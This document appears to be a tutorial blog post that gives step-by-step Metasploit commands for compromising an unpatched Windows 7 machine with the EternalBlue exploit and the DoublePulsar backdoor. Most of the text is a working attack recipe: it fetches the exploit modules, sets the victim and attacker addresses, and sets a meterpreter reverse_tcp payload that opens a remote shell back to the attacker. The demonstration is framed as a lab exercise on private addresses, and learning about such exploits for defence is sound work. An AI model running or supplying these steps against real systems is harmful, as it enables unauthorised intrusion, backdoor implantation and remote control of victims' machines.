EternalBlue DoublePulsar Exploit through Metasploit Windows 7

WINDOWS 7 REMOTE EXPLOITATION WITH ETERNALBLUE & DOUBLEPULSAR EXPLOIT THROUGH METASPLOIT

EternalBlue is an exploit used by the WannaCry ransomware and is among the National Security Agency (NSA) exploits disclosed by the Shadow Brokers hackers group. The remote code execution vulnerability in Windows SMB is the vulnerability exploited by SMB. Microsoft has released a patch MS17-010 to address the vulnerability exploited by the EternalBlue exploit.  Sending crafted SMB packets over multiple TCP connections is what is employed by EternalBlue to exploit a target machine. EternalBlue exploit is used alongside DoublePulsar, a backdoor implant. Used together, the DoublePulsar, creates a backdoor, which is then used by the attackers to plant a secondary malware into the victim’s system. DoublePulsar enables persistence on the victim’s machine.

This articles describes the use of EternalBlue and DoublePulsar to hack into a Windows 7 machine. To achieve that we are going to make use of Metasploit in Kali Linux machine. To determine the IP address of our both machines residing in a Virtual Machine, we are going to issue the following commands on the windows target:

ipconfig

And run the following command on the Kali Machine

ifconfig

The IP addresses of both machines have been determined to be 192.168.43.104 and 192.168.43.45 respectively. Also for the attack to be successful, we have to make sure port 445 is open on the target host. So we can run a port scan on the target host to determine that. To ensure that our Kali Machine is up to date we can run the following commands:

apt-get update -y && apt-get upgrade -y

We now download and add the exploit and the scanner to the Metasploit. We first issue the following commands on our attacking machine, respectively:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

gitclone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

We now move file smb_ms17_010.rb under the folder usr/share/metasploit-framework/modules/auxiliary/scanner/smb

We then copy EternalBlue-Doublepulsar.rb and debs to usr/share/metasploit-framework/modules/exploits/windows/smb. Next we open the EternalBlue-Doublepulsar.rb with any editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory usr/share/metasploit-framework/modules/exploits/windows/smb. We then specify the name of the process to be injected, we have specified here as explorer.exe. Then we would launch msfconsole and use the auxiliary scan module.  smb_ms17_010.rb.

 use auxiliary/scanner/smb/smb_ms17_010

Then we run the following commands to determine our various options:

show options

We now setup RHOSTS IP which is the Victims IP address.

set RHOSTS 192.168.43.104

After doing that, we run the exploit with the run command:

run

Upon running the exploit, it will go and check whether the host is vulnerable or not and also display the victim machine details.

Next we move to the exploit EternalBlue and DoublePulsar with the following commands:

use exploit/windows/smb/eternalblue_doublepulsar

set PAYLOAD windows/meterpreter/reverse_tcp

set RHOST 192.168.43.104

set LHOST 192.168.43.45

set targetarchitecture x86

After setting all the above options with the above commands, we now run the exploit, by issuing this command:

exploit

And lo and behold we have a meterpreter shell in Windows 7.

To confirm that our attack is successful we issue the command:

sysinfo

This will return information about the target machine.